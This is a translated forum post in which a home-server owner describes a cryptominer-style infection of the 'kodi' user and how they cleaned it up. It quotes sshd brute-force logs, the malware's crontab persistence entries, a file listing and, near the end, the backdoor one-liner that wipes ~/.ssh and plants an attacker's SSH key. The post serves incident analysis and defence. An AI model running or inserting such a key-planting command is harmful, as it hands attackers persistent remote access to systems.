Нещодавно я помітив, що мій домашній сервер болісно повільний. Усі ресурси були з'їдені двома процесами: crond64
і tsm
. Незважаючи на те, що я їх неодноразово вбивав, вони постійно і знову з'являлися.
У той же час мій провайдер повідомляв мене про зловживання, пов’язане з моєю IP-адресою:
==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]
Я був нахилений на на цьому сайті , що я міг би бути вірус. Я запускаю Sophos AV, скануючи весь мій жорсткий диск, і він дійсно знайшов якийсь вірус /tmp/.mountfs/.rsync
. Тому я видалив всю папку і подумав, що це все. Але згодом вона поверталася. Потім я перевірив файл cron користувача в /var/spool/cron/crontabs/kodi
(вірус працював з користувачем мого медіа-сервера kodi), який виглядав так:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb 3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1
Схоже, вірус повторно реактивується з іншого каталогу з іншого каталогу. Вміст цього каталогу:
>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d /home/kodi/.ttp/dir2.dir
/home/kodi/.ttp/a:
a bash.pid config.txt crond32 crond64 cronda crondb dir.dir pools.txt run stop upd
/home/kodi/.ttp/b:
a dir.dir rsync run stop sync
/home/kodi/.ttp/c:
aptitude dir.dir go ip lib n p run slow start stop tsm tsm32 tsm64 v watchdog
Я видалив усі ці файли та записи в crontab і сподіваюся, що з цим проблема вирішена. Однак мені було б цікаво, що це за вірус, як я, можливо, його зловив (він може бути пов'язаний з Kodi) і що я можу зробити, щоб його запобігти. На щастя, він працював лише від користувача з обмеженими правами, але це все-таки було прикро.
EDIT
Хоча я, здавалося б, видалив усі залишки цього вірусу (я також видалив всю папку tmp), вірус продовжував повертатися. Я зрозумів, що там є запис ~/.ssh/authorized_hosts
, якого я точно не ставив. Це пояснює, як вірус можна було повторно пересаджувати. Я видалив запис, вимкнено вхід для цього користувача, вимкнено вхід пароля (лише пароль) і зараз використовую нестандартний порт.
Я також помітив неодноразові спроби входу на свій сервер із випадковими іменами користувачів, ймовірно, через якийсь бот (журнал виглядав приголомшливо подібним до того, який запускався з мого IP, надісланого мені провайдером). Я думаю, що саме так мій комп'ютер заразився в першу чергу.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
. Я просто зробив це, cp /etc/skel/.bashrc /home/mycompromiseduser/
щоб видалити його.